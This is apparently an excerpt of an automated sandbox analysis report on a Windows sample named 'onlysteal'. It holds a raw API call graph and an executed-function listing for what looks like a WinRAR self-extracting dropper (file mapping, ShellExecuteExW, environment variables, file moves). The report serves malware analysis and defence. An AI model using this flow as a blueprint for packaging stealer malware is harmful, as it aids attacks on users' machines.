24402->24408 24419 24c1d9 SendMessageW 24402->24419 24403->24385 24404 24ba87 24409 24ba90 GetLastError 24404->24409 24410 24ba9e 24404->24410 24405->24411 24406 24c0cb 24415 24c73f 97 API calls 24406->24415 24408->24411 24420 23e617 53 API calls 24408->24420 24409->24410 24416 24bb11 24410->24416 24421 24baae GetTickCount 24410->24421 24422 24bb20 24410->24422 24618 249ed5 32 API calls 24412->24618 24413 24c1b0 24621 2312d3 GetDlgItem EnableWindow 24413->24621 24414->24398 24423 23e617 53 API calls 24414->24423 24415->24438 24416->24422 24424 24bd56 24416->24424 24419->24408 24427 24b862 24420->24427 24428 234092 _swprintf 51 API calls 24421->24428 24431 24bcfb 24422->24431 24432 24bcf1 24422->24432 24433 24bb39 GetModuleFileNameW 24422->24433 24429 24bed0 24423->24429 24521 2312f1 GetDlgItem ShowWindow 24424->24521 24425 24c066 24425->24435 24427->24372 24427->24411 24437 24bac7 24428->24437 24439 234092 _swprintf 51 API calls 24429->24439 24430 24c169 24619 249ed5 32 API calls 24430->24619 24434 23e617 53 API calls 24431->24434 24432->24339 24432->24431 24612 23f28c 82 API calls 24433->24612 24443 24bd05 24434->24443 24435->24406 24444 24c73f 97 API calls 24435->24444 24436 24bd66 24522 2312f1 GetDlgItem ShowWindow 24436->24522 24513 23966e 24437->24513 24438->24394 24438->24430 24446 23e617 53 API calls 24438->24446 24439->24398 24442 24bb5f 24448 234092 _swprintf 51 API calls 24442->24448 24449 234092 _swprintf 51 API calls 24443->24449 24450 24c0a0 24444->24450 24446->24438 24447 24c188 24447->24394 24452 24bb81 CreateFileMappingW 24448->24452 24453 24bd23 24449->24453 24450->24406 24454 24c0a9 DialogBoxParamW 24450->24454 24451 24bd70 24455 23e617 53 API calls 24451->24455 24457 24bc60 __InternalCxxFrameHandler 24452->24457 24458 24bbe3 GetCommandLineW 24452->24458 24467 23e617 53 API calls 24453->24467 24454->24339 24454->24406 24459 24bd7a SetDlgItemTextW 24455->24459 24462 24bc6b ShellExecuteExW 24457->24462 24461 24bbf4 24458->24461 24523 2312f1 GetDlgItem ShowWindow 24459->24523 24460 24baed 24464 24baf4 GetLastError 24460->24464 24465 24baff 24460->24465 24613 24b425 SHGetMalloc 24461->24613 24468 24bc88 24462->24468 24464->24465 24470 23959a 80 API calls 24465->24470 24472 24bd3d 24467->24472 24480 24bccb 24468->24480 24489 24bcb7 Sleep 24468->24489 24469 24bd8c SetDlgItemTextW GetDlgItem 24473 24bdc1 24469->24473 24474 24bda9 GetWindowLongW SetWindowLongW 24469->24474 24470->24416 24471 24bc10 24614 24b425 SHGetMalloc 24471->24614 24524 24c73f 24473->24524 24474->24473 24477 24bc1c 24615 24b425 SHGetMalloc 24477->24615 24480->24432 24486 24bce1 UnmapViewOfFile CloseHandle 24480->24486 24481 24c73f 97 API calls 24483 24bddd 24481->24483 24482 24bc28 24616 23f3fa 82 API calls 2 library calls 24482->24616 24549 24da52 24483->24549 24486->24432 24487 24bc3f MapViewOfFile 24487->24457 24489->24468 24489->24480 24490 24c73f 97 API calls 24493 24be03 24490->24493 24491 24be2c 24617 2312d3 GetDlgItem EnableWindow 24491->24617 24493->24491 24495 24c73f 97 API calls 24493->24495 24494->24339 24494->24363 24495->24491 24497 231378 24496->24497 24498 23131f 24496->24498 24623 23e2c1 GetWindowLongW SetWindowLongW 24497->24623 24500 231385 24498->24500 24622 23e2e8 62 API calls 2 library calls 24498->24622 24500->24332 24500->24333 24500->24411 24502 231341 24502->24500 24503 231354 GetDlgItem 24502->24503 24503->24500 24504 231364 24503->24504 24504->24500 24505 23136a SetWindowTextW 24504->24505 24505->24500 24509 23a0bb 24506->24509 24507 23a14c 24508 23a2b2 8 API calls 24507->24508 24510 23a175 24507->24510 24508->24510 24509->24507 24509->24510 24624 23a2b2 24509->24624 24510->24390 24510->24391 24512->24404 24514 239678 24513->24514 24515 2396d5 CreateFileW 24514->24515 24516 2396c9 24514->24516 24515->24516 24517 23971f 24516->24517 24518 23bb03 GetCurrentDirectoryW 24516->24518 24517->24460 24519 239704 24518->24519 24519->24517 24520 239708 CreateFileW 24519->24520 24520->24517 24521->24436 24522->24451 24523->24469 24525 24c749 __EH_prolog 24524->24525 24526 24bdcf 24525->24526 24656 24b314 24525->24656 24526->24481 24529 24b314 ExpandEnvironmentStringsW 24538 24c780 _wcslen _wcsrchr 24529->24538 24530 24ca67 SetWindowTextW 24530->24538 24535 24c855 SetFileAttributesW 24536 24c90f GetFileAttributesW 24535->24536 24548 24c86f __cftof _wcslen 24535->24548 24536->24538 24540 24c921 DeleteFileW 24536->24540 24538->24526 24538->24529 24538->24530 24538->24535 24541 24cc31 GetDlgItem SetWindowTextW SendMessageW 24538->24541 24545 24cc71 SendMessageW 24538->24545 24660 241fbb CompareStringW 24538->24660 24661 24a64d GetCurrentDirectoryW 24538->24661 24663 23a5d1 6 API calls 24538->24663 24664 23a55a FindClose 24538->24664 24665 24b48e 76 API calls 2 library calls 24538->24665 24666 253e3e 24538->24666 24540->24538 24542 24c932 24540->24542 24541->24538 24543 234092 _swprintf 51 API calls 24542->24543 24544 24c952 GetFileAttributesW 24543->24544 24544->24542 24546 24c967 MoveFileW 24544->24546 24545->24538 24546->24538 24547 24c97f MoveFileExW 24546->24547 24547->24538 24548->24536 24548->24538 24662 23b991 51 API calls 3 library calls 24548->24662 24550 24da5c __EH_prolog 24549->24550 24681 240659 24550->24681 24552 24da8d 24685 235b3d 24552->24685 24554 24daab 24689 237b0d 24554->24689 24558 24dafe 24705 237b9e 24558->24705 24560 24bdee 24560->24490 24562 24d6a8 24561->24562 24563 24a5c6 4 API calls 24562->24563 24564 24d6ad 24563->24564 24565 24d6b5 GetWindow 24564->24565 24566 24bf15 24564->24566 24565->24566 24569 24d6d5 24565->24569 24566->24340 24566->24341 24567 24d6e2 GetClassNameW 25190 241fbb CompareStringW 24567->25190 24569->24566 24569->24567 24570 24d706 GetWindowLongW 24569->24570 24571 24d76a GetWindow 24569->24571 24570->24571 24572 24d716 SendMessageW 24570->24572 24571->24566 24571->24569 24572->24571 24573 24d72c GetObjectW 24572->24573 25191 24a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24573->25191 24575 24d743 25192 24a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24575->25192 25193 24a80c 8 API calls 24575->25193 24578 24d754 SendMessageW DeleteObject 24578->24571 24579->24353 24581 24abcc 24580->24581 24586 24abf1 24580->24586 25194 241fbb CompareStringW 24581->25194 24583 24abf6 SHAutoComplete 24584 24abff 24583->24584 24588 24b093 24584->24588 24585 24abdf 24585->24586 24587 24abe3 FindWindowExW 24585->24587 24586->24583 24586->24584 24587->24586 24589 24b09d __EH_prolog 24588->24589 24590 2313dc 84 API calls 24589->24590 24591 24b0bf 24590->24591 25195 231fdc 24591->25195 24594 24b0d9 24596 231692 86 API calls 24594->24596 24595 24b0eb 24597 2319af 128 API calls 24595->24597 24598 24b0e4 24596->24598 24600 24b10d __InternalCxxFrameHandler ___std_exception_copy 24597->24600 24598->24379 24598->24383 24599 231692 86 API calls 24599->24598 24600->24599 24601->24427 25203 24b568 PeekMessageW 24602->25203 24605 24d536 SendMessageW SendMessageW 24607 24d591 SendMessageW SendMessageW SendMessageW 24605->24607 24608 24d572 24605->24608 24606 24d502 24609 24d50d ShowWindow SendMessageW SendMessageW 24606->24609 24610 24d5c4 SendMessageW 24607->24610 24611 24d5e7 SendMessageW 24607->24611 24608->24607 24609->24605 24610->24611 24611->24382 24612->24442 24613->24471 24614->24477 24615->24482 24616->24487 24617->24494 24618->24425 24619->24447 24620->24413 24621->24402 24622->24502 24623->24500 24625 23a2bf 24624->24625 24626 23a2e3 24625->24626 24627 23a2d6 CreateDirectoryW 24625->24627 24645 23a231 24626->24645 24627->24626 24629 23a316 24627->24629 24632 23a325 24629->24632 24637 23a4ed 24629->24637 24631 23a329 GetLastError 24631->24632 24632->24509 24634 23bb03 GetCurrentDirectoryW 24635 23a2ff 24634->24635 24635->24631 24636 23a303 CreateDirectoryW 24635->24636 24636->24629 24636->24631 24638 24ec50 24637->24638 24639 23a4fa SetFileAttributesW 24638->24639 24640 23a510 24639->24640 24641 23a53d 24639->24641 24642 23bb03 GetCurrentDirectoryW 24640->24642 24641->24632 24643 23a524 24642->24643 24643->24641 24644 23a528 SetFileAttributesW 24643->24644 24644->24641 24648 23a243 24645->24648 24649 24ec50 24648->24649 24650 23a250 GetFileAttributesW 24649->24650 24651 23a261 24650->24651 24652 23a23a 24650->24652 24653 23bb03 GetCurrentDirectoryW 24651->24653 24652->24631 24652->24634 24654 23a275 24653->24654 24654->24652 24655 23a279 GetFileAttributesW 24654->24655 24655->24652 24657 24b31e 24656->24657 24658 24b3f0 ExpandEnvironmentStringsW 24657->24658 24659 24b40d 24657->24659 24658->24659 24659->24538 24660->24538 24661->24538 24662->24548 24663->24538 24664->24538 24665->24538 24667 258e54 24666->24667 24668 258e61 24667->24668 24669 258e6c 24667->24669 24670 258e06 __vsnwprintf_l 21 API calls 24668->24670 24671 258e74 24669->24671 24677 258e7d _unexpected 24669->24677 24676 258e69 24670->24676 24672 258dcc _free 20 API calls 24671->24672 24672->24676 24673 258ea7 HeapReAlloc 24673->24676 24673->24677 24674 258e82 24679 2591a8 20 API calls __dosmaperr 24674->24679 24676->24538 24677->24673 24677->24674 24680 257a5e 7 API calls 2 library calls 24677->24680 24679->24676 24680->24677 24682 240666 _wcslen 24681->24682 24709 2317e9 24682->24709 24684 24067e 24684->24552 24686 240659 _wcslen 24685->24686 24687 2317e9 78 API calls 24686->24687 24688 24067e 24687->24688 24688->24554 24690 237b17 __EH_prolog 24689->24690 24726 23ce40 24690->24726 24692 237b32 24693 24eb38 8 API calls 24692->24693 24695 237b5c 24693->24695 24732 244a76 24695->24732 24697 237c7d 24698 237c87 24697->24698 24700 237cf1 24698->24700 24761 23a56d 24698->24761 24701 237d50 24700->24701 24739 238284 24700->24739 24703 237d92 24701->24703 24767 23138b 74 API calls 24701->24767 24703->24558 24706 237bac 24705->24706 24708 237bb3 24705->24708 24707 242297 86 API calls 24706->24707 24707->24708 24710 2317ff 24709->24710 24721 23185a __InternalCxxFrameHandler 24709->24721 24711 231828 24710->24711 24722 236c36 76 API calls __vswprintf_c_l 24710->24722 24713 231887 24711->24713 24716 231847 ___std_exception_copy 24711->24716 24715 253e3e 22 API calls 24713->24715 24714 23181e 24723 236ca7 75 API calls 24714->24723 24718 23188e 24715->24718 24716->24721 24724 236ca7 75 API calls 24716->24724 24718->24721 24725 236ca7 75 API calls 24718->24725 24721->24684 24722->24714 24723->24711 24724->24721 24725->24721 24727 23ce4a __EH_prolog 24726->24727 24728 24eb38 8 API calls 24727->24728 24730 23ce8d 24728->24730 24729 24eb38 8 API calls 24731 23ceb1 24729->24731 24730->24729 24731->24692 24733 244a80 __EH_prolog 24732->24733 24734 24eb38 8 API calls 24733->24734 24735 244a9c 24734->24735 24736 237b8b 24735->24736 24738 240e46 80 API calls 24735->24738 24736->24697 24738->24736 24740 23828e __EH_prolog 24739->24740 24768 2313dc 24740->24768 24742 2382aa 24743 2382bb 24742->24743 24911 239f42 24742->24911 24746 2382f2 24743->24746 24776 231a04 24743->24776 24907 231692 24746->24907 24749 238389 24795 238430 24749->24795 24752 2383e8 24803 231f6d 24752->24803 24755 2382ee 24755->24746 24755->24749 24759 23a56d 7 API calls 24755->24759 24915 23c0c5 CompareStringW _wcslen 24755->24915 24757 2383f3 24757->24746 24807 233b2d 24757->24807 24819 23848e 24757->24819 24759->24755 24762 23a582 24761->24762 24763 23a5b0 24762->24763 25179 23a69b 24762->25179 24763->24698 24765 23a592 24765->24763 24766 23a597 FindClose 24765->24766 24766->24763 24767->24703 24769 2313e1 __EH_prolog 24768->24769 24770 23ce40 8 API calls 24769->24770 24771 231419 24770->24771 24772 24eb38 8 API calls 24771->24772 24775 231474 __cftof 24771->24775 24773 231461 24772->24773 24773->24775 24916 23b505 24773->24916 24775->24742 24777 231a0e __EH_prolog 24776->24777 24779 231a61 24777->24779 24784 231b9b 24777->24784 24932 2313ba 24777->24932 24780 231bc7 24779->24780 24779->24784 24785 231bd4 24779->24785 24935 23138b 74 API calls 24780->24935 24783 233b2d 101 API calls 24789 231c12 24783->24789 24784->24755 24785->24783 24785->24784 24786 231c5a 24786->24784 24790 231c8d 24786->24790 24936 23138b 74 API calls 24786->24936 24788 233b2d 101 API calls 24788->24789 24789->24786 24789->24788 24790->24784 24794 239e80 79 API calls 24790->24794 24791 233b2d 101 API calls 24792 231cde 24791->24792 24792->24784 24792->24791 24793 239e80 79 API calls 24793->24779 24794->24792 24954 23cf3d 24795->24954 24797 238440 24958 2413d2 GetSystemTime SystemTimeToFileTime 24797->24958 24799 2383a3 24799->24752 24800 241b66 24799->24800 24963 24de6b 24800->24963 24804 231f72 __EH_prolog 24803->24804 24806 231fa6 24804->24806 24971 2319af 24804->24971 24806->24757 24808 233b39 24807->24808 24809 233b3d 24807->24809 24808->24757 24818 239e80 79 API calls 24809->24818 24810 233b4f 24811 233b6a 24810->24811 24812 233b78 24810->24812 24814 233baa 24811->24814 25101 2332f7 89 API calls 2 library calls 24811->25101 25102 23286b 101 API calls 3 library calls 24812->25102 24814->24757 24816 233b76 24816->24814 25103 2320d7 74 API calls 24816->25103 24818->24810 24820 238498 __EH_prolog 24819->24820 24823 2384d5 24820->24823 24830 238513 24820->24830 25127 248c8d 103 API calls 24820->25127 24822 2384f5 24824 2384fa 24822->24824 24825 23851c 24822->24825 24823->24822 24828 23857a 24823->24828 24823->24830 24824->24830 25128 237a0d 152 API calls 24824->25128 24825->24830 25129 248c8d 103 API calls 24825->25129 24828->24830 25104 235d1a 24828->25104 24830->24757 24831 238605 24831->24830 25110 238167 24831->25110 24834 238797 24835 23a56d 7 API calls 24834->24835 24838 238802 24834->24838 24835->24838 24837 23d051 82 API calls 24839 23885d 24837->24839 25116 237c0d 24838->25116 24839->24830 24839->24837 24840 23898b 24839->24840 24842 238992 24839->24842 25130 238117 84 API calls 24839->25130 25131 232021 74 API calls 24839->25131 25132 232021 74 API calls 24840->25132 24841 238a5f 24846 238ab6 24841->24846 24858 238a6a 24841->24858 24842->24841 24845 2389e1 24842->24845 24848 238b14 24845->24848 24851 23a231 3 API calls 24845->24851 24856 238a4c 24845->24856 24846->24856 25135 237fc0 97 API calls 24846->25135 24847 239105 24853 23959a 80 API calls 24847->24853 24848->24847 24867 238b82 24848->24867 25136 2398bc 24848->25136 24849 238ab4 24850 23959a 80 API calls 24849->24850 24850->24830 24854 238a19 24851->24854 24853->24830 24854->24856 25133 2392a3 97 API calls 24854->25133 24855 23ab1a 8 API calls 24859 238bd1 24855->24859 24856->24848 24856->24849 24858->24849 25134 237db2 101 API calls 24858->25134 24862 23ab1a 8 API calls 24859->24862 24879 238be7 24862->24879 24865 238b70 25140 236e98 77 API calls 24865->25140 24867->24855 24868 238cbc 24869 238e40 24868->24869 24870 238d18 24868->24870 24873 238e52 24869->24873 24874 238e66 24869->24874 24893 238d49 24869->24893 24871 238d8a 24870->24871 24872 238d28 24870->24872 24881 238167 19 API calls 24871->24881 24876 238d6e 24872->24876 24884 238d37 24872->24884 24877 239215 123 API calls 24873->24877 24875 243377 75 API calls 24874->24875 24878 238e7f 24875->24878 24876->24893 25143 2377b8 111 API calls 24876->25143 24877->24893 25146 243020 123 API calls 24878->25146 24879->24868 24880 238c93 24879->24880 24887 23981a 79 API calls 24879->24887 24880->24868 25141 239a3c 82 API calls 24880->25141 24885 238dbd 24881->24885 25142 232021 74 API calls 24884->25142 24889 238de6 24885->24889 24890 238df5 24885->24890 24885->24893 24887->24880 25144 237542 85 API calls 24889->25144 25145 239155 93 API calls __EH_prolog 24890->25145 24896 238f85 24893->24896 25147 232021 74 API calls 24893->25147 24895 239090 24895->24847 24898 23a4ed 3 API calls 24895->24898 24896->24847 24896->24895 24897 23903e 24896->24897 25148 239f09 SetEndOfFile 24896->25148 25122 239da2 24897->25122 24899 2390eb 24898->24899 24899->24847 25149 232021 74 API calls 24899->25149 24902 239085 24904 239620 77 API calls 24902->24904 24904->24895 24905 2390fb 25150 236dcb 76 API calls _wcschr 24905->25150 24908 2316a4 24907->24908 25166 23cee1 24908->25166 24912 239f59 24911->24912 24913 239f63 24912->24913 25178 236d0c 78 API calls 24912->25178 24913->24743 24915->24755 24917 23b50f __EH_prolog 24916->24917 24922 23f1d0 82 API calls 24917->24922 24919 23b521 24923 23b61e 24919->24923 24922->24919 24924 23b630 __cftof 24923->24924 24927 2410dc 24924->24927 24930 24109e GetCurrentProcess GetProcessAffinityMask 24927->24930 24931 23b597 24930->24931 24931->24775 24937 231732 24932->24937 24934 2313d6 24934->24793 24935->24784 24936->24790 24938 231748 24937->24938 24949 2317a0 __InternalCxxFrameHandler 24937->24949 24939 231771 24938->24939 24950 236c36 76 API calls __vswprintf_c_l 24938->24950 24941 2317c7 24939->24941 24946 23178d ___std_exception_copy 24939->24946 24943 253e3e 22 API calls 24941->24943 24942 231767 24951 236ca7 75 API calls 24942->24951 24945 2317ce 24943->24945 24945->24949 24953 236ca7 75 API calls 24945->24953 24946->24949 24952 236ca7 75 API calls 24946->24952 24949->24934 24950->24942 24951->24939 24952->24949 24953->24949 24955 23cf4d 24954->24955 24957 23cf54 24954->24957 24959 23981a 24955->24959 24957->24797 24958->24799 24960 239833 24959->24960 24962 239e80 79 API calls 24960->24962 24961 239865 24961->24957 24962->24961 24964 24de78 24963->24964 24965 23e617 53 API calls 24964->24965 24966 24de9b 24965->24966 24967 234092 _swprintf 51 API calls 24966->24967 24968 24dead 24967->24968 24969 24d4d4 16 API calls 24968->24969 24970 241b7c 24969->24970 24970->24752 24972 2319bb 24971->24972 24973 2319bf 24971->24973 24972->24806 24975 2318f6 24973->24975 24976 231945 24975->24976 24977 231908 24975->24977 24983 233fa3 24976->24983 24978 233b2d 101 API calls 24977->24978 24981 231928 24978->24981 24981->24972 24986 233fac 24983->24986 24984 233b2d 101 API calls 24984->24986 24985 231966 24985->24981 24988 231e50 24985->24988 24986->24984 24986->24985 25000 240e08 24986->25000 24989 231e5a __EH_prolog 24988->24989 25008 233bba 24989->25008 24991 231e84 24992 231732 78 API calls 24991->24992 24995 231f0b 24991->24995 24993 231e9b 24992->24993 25036 2318a9 78 API calls 24993->25036 24995->24981 24996 231eb3 24998 231ebf _wcslen 24996->24998 25037 241b84 MultiByteToWideChar 24996->25037 25038 2318a9 78 API calls 24998->25038 25001 240e0f 25000->25001 25002 240e2a 25001->25002 25006 236c31 RaiseException _com_raise_error 25001->25006 25004 240e3b SetThreadExecutionState 25002->25004 25007 236c31 RaiseException _com_raise_error 25002->25007 25004->24986 25006->25002 25007->25004 25009 233bc4 __EH_prolog 25008->25009 25010 233bf6 25009->25010 25011 233bda 25009->25011 25013 233e51 25010->25013 25016 233c22 25010->25016 25064 23138b 74 API calls 25011->25064 25081 23138b 74 API calls 25013->25081 25015 233be5 25015->24991 25016->25015 25039 243377 25016->25039 25018 233ca3 25019 233d2e 25018->25019 25035 233c9a 25018->25035 25067 23d051 25018->25067 25049 23ab1a 25019->25049 25020 233c9f 25020->25018 25066 2320bd 78 API calls 25020->25066 25022 233c71 25022->25018 25022->25020 25023 233c8f 25022->25023 25065 23138b 74 API calls 25023->25065 25026 233d41 25029 233dd7 25026->25029 25030 233dc7 25026->25030 25073 243020 123 API calls 25029->25073 25053 239215 25030->25053 25033 233dd5 25033->25035 25074 232021 74 API calls 25033->25074 25075 242297 25035->25075 25036->24996 25037->24998 25038->24995 25040 24338c 25039->25040 25042 243396 ___std_exception_copy 25039->25042 25082 236ca7 75 API calls 25040->25082 25043 2434c6 25042->25043 25044 24341c 25042->25044 25048 243440 __cftof 25042->25048 25084 25238d RaiseException 25043->25084 25083 2432aa 75 API calls 3 library calls 25044->25083 25047 2434f2 25048->25022 25050 23ab28 25049->25050 25052 23ab32 25049->25052 25051 24eb38 8 API calls 25050->25051 25051->25052 25052->25026 25054 23921f __EH_prolog 25053->25054 25085 237c64 25054->25085 25057 2313ba 78 API calls 25058 239231 25057->25058 25088 23d114 25058->25088 25060 23928a 25060->25033 25062 23d114 118 API calls 25063 239243 25062->25063 25063->25060 25063->25062 25097 23d300 97 API calls __InternalCxxFrameHandler 25063->25097 25064->25015 25065->25035 25066->25018 25068 23d072 25067->25068 25069 23d084 25067->25069 25098 23603a 82 API calls 25068->25098 25099 23603a 82 API calls 25069->25099 25072 23d07c 25072->25019 25073->25033 25074->25035 25076 2422a1 25075->25076 25077 2422ba 25076->25077 25080 2422ce 25076->25080 25100 240eed 86 API calls 25077->25100 25079 2422c1 25079->25080 25081->25015 25082->25042 25083->25048 25084->25047 25086 23b146 GetVersionExW 25085->25086 25087 237c69 25086->25087 25087->25057 25094 23d12a __InternalCxxFrameHandler 25088->25094 25089 23d29a 25090 23d2ce 25089->25090 25091 23d0cb 6 API calls 25089->25091 25092 240e08 SetThreadExecutionState RaiseException 25090->25092 25091->25090 25095 23d291 25092->25095 25093 248c8d 103 API calls 25093->25094 25094->25089 25094->25093 25094->25095 25096 23ac05 91 API calls 25094->25096 25095->25063 25096->25094 25097->25063 25098->25072 25099->25072 25100->25079 25101->24816 25102->24816 25103->24814 25105 235d2a 25104->25105 25151 235c4b 25105->25151 25107 235d5d 25109 235d95 25107->25109 25156 23b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25107->25156 25109->24831 25111 238186 25110->25111 25112 238232 25111->25112 25163 23be5e 19 API calls __InternalCxxFrameHandler 25111->25163 25162 241fac CharUpperW 25112->25162 25115 23823b 25115->24834 25117 237c22 25116->25117 25118 237c5a 25117->25118 25164 236e7a 74 API calls 25117->25164 25118->24839 25120 237c52 25165 23138b 74 API calls 25120->25165 25123 239db3 25122->25123 25126 239dc2 25122->25126 25124 239db9 FlushFileBuffers 25123->25124 25123->25126 25124->25126 25125 239e3f SetFileTime 25125->24902 25126->25125 25127->24823 25128->24830 25129->24830 25130->24839 25131->24839 25132->24842 25133->24856 25134->24849 25135->24856 25137 238b5a 25136->25137 25138 2398c5 GetFileType 25136->25138 25137->24867 25139 232021 74 API calls 25137->25139 25138->25137 25139->24865 25140->24867 25141->24868 25142->24893 25143->24893 25144->24893 25145->24893 25146->24893 25147->24896 25148->24897 25149->24905 25150->24847 25157 235b48 25151->25157 25153 235c6c 25153->25107 25155 235b48 2 API calls 25155->25153 25156->25107 25158 235b52 25157->25158 25160 235c3a 25158->25160 25161 23b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25158->25161 25160->25153 25160->25155 25161->25158 25162->25115 25163->25112 25164->25120 25165->25118 25167 23cef2 25166->25167 25172 23a99e 25167->25172 25169 23cf24 25170 23a99e 86 API calls 25169->25170 25171 23cf2f 25170->25171 25173 23a9c1 25172->25173 25176 23a9d5 25172->25176 25177 240eed 86 API calls 25173->25177 25175 23a9c8 25175->25176 25176->25169 25177->25175 25178->24913 25180 23a6a8 25179->25180 25181 23a6c1 FindFirstFileW 25180->25181 25182 23a727 FindNextFileW 25180->25182 25183 23a6d0 25181->25183 25189 23a709 25181->25189 25184 23a732 GetLastError 25182->25184 25182->25189 25185 23bb03 GetCurrentDirectoryW 25183->25185 25184->25189 25186 23a6e0 25185->25186 25187 23a6e4 FindFirstFileW 25186->25187 25188 23a6fe GetLastError 25186->25188 25187->25188 25187->25189 25188->25189 25189->24765 25190->24569 25191->24575 25192->24575 25193->24578 25194->24585 25196 239f42 78 API calls 25195->25196 25197 231fe8 25196->25197 25198 232005 25197->25198 25199 231a04 101 API calls 25197->25199 25198->24594 25198->24595 25200 231ff5 25199->25200 25200->25198 25202 23138b 74 API calls 25200->25202 25202->25198 25204 24b583 GetMessageW 25203->25204 25205 24b5bc GetDlgItem 25203->25205 25206 24b5a8 TranslateMessage DispatchMessageW 25204->25206 25207 24b599 IsDialogMessageW 25204->25207 25205->24605 25205->24606 25206->25205 25207->25205 25207->25206 25396 2494e0 GetClientRect 25397 24f2e0 46 API calls __RTC_Initialize 25443 2421e0 26 API calls std::bad_exception::bad_exception 25398 25bee0 GetCommandLineA GetCommandLineW 25444 23f1e8 FreeLibrary 25399 235ef0 82 API calls 25446 2395f0 80 API calls 25215 2598f0 25223 25adaf 25215->25223 25217 259904 25220 25990c 25221 259919 25220->25221 25231 259920 11 API calls 25220->25231 25224 25ac98 _unexpected 5 API calls 25223->25224 25225 25add6 25224->25225 25226 25adee TlsAlloc 25225->25226 25227 25addf 25225->25227 25226->25227 25228 24fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25227->25228 25229 2598fa 25228->25229 25229->25217 25230 259869 20 API calls 2 library calls 25229->25230 25230->25220 25231->25217 25232 25abf0 25233 25abfb 25232->25233 25234 25af0a 11 API calls 25233->25234 25235 25ac24 25233->25235 25237 25ac20 25233->25237 25234->25233 25238 25ac50 DeleteCriticalSection 25235->25238 25238->25237 25400 2588f0 7 API calls ___scrt_uninitialize_crt 25448 24fd4f 9 API calls 2 library calls 25402 252cfb 38 API calls 4 library calls 25449 24b5c0 100 API calls 25450 2477c0 118 API calls 25451 24ffc0 RaiseException _com_raise_error _com_error::_com_error 25265 24dec2 25266 24decf 25265->25266 25267 23e617 53 API calls 25266->25267 25268 24dedc 25267->25268 25269 234092 _swprintf 51 API calls 25268->25269 25270 24def1 SetDlgItemTextW 25269->25270 25271 24b568 5 API calls 25270->25271 25272 24df0e 25271->25272 25404 2462ca 123 API calls __InternalCxxFrameHandler 25279 24e2d7 25280 24e1db 25279->25280 25281 24e85d ___delayLoadHelper2@8 14 API calls 25280->25281 25281->25280 25283 24e1d1 14 API calls ___delayLoadHelper2@8 25454 25a3d0 21 API calls 2 library calls 25284 2310d5 25289 235abd 25284->25289 25290 235ac7 __EH_prolog 25289->25290 25291 23b505 84 API calls 25290->25291 25292 235ad3 25291->25292 25296 235cac GetCurrentProcess GetProcessAffinityMask 25292->25296 25455 262bd0 VariantClear 25407 24f4d3 20 API calls 25408 250ada 51 API calls 2 library calls

                                      Executed Functions

                                      Function 0024DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00240863: GetModuleHandleW.KERNEL32(kernel32), ref: 0024087C
                                        • Part of subcall function 00240863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0024088E
                                        • Part of subcall function 00240863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002408BF
                                        • Part of subcall function 0024A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0024A655
                                        • Part of subcall function 0024AC16: OleInitialize.OLE32(00000000), ref: 0024AC2F
                                        • Part of subcall function 0024AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0024AC66
                                        • Part of subcall function 0024AC16: SHGetMalloc.SHELL32(00278438), ref: 0024AC70
                                      • GetCommandLineW.KERNEL32 ref: 0024DF5C
                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0024DF83
                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0024DF94
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0024DFCE
                                        • Part of subcall function 0024DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0024DBF4
                                        • Part of subcall function 0024DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0024DC30
                                      • CloseHandle.KERNEL32(00000000), ref: 0024DFD7
                                      • GetModuleFileNameW.KERNEL32(00000000,0028EC90,00000800), ref: 0024DFF2
                                      • SetEnvironmentVariableW.KERNEL32(sfxname,0028EC90), ref: 0024DFFE
                                      • GetLocalTime.KERNEL32(?), ref: 0024E009
                                      • _swprintf.LIBCMT ref: 0024E048
                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0024E05A
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0024E061
                                      • LoadIconW.USER32(00000000,00000064), ref: 0024E078
                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0024E0C9
                                      • Sleep.KERNEL32(?), ref: 0024E0F7
                                      • DeleteObject.GDI32 ref: 0024E130
                                      • DeleteObject.GDI32(?), ref: 0024E140
                                      • CloseHandle.KERNEL32 ref: 0024E183
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
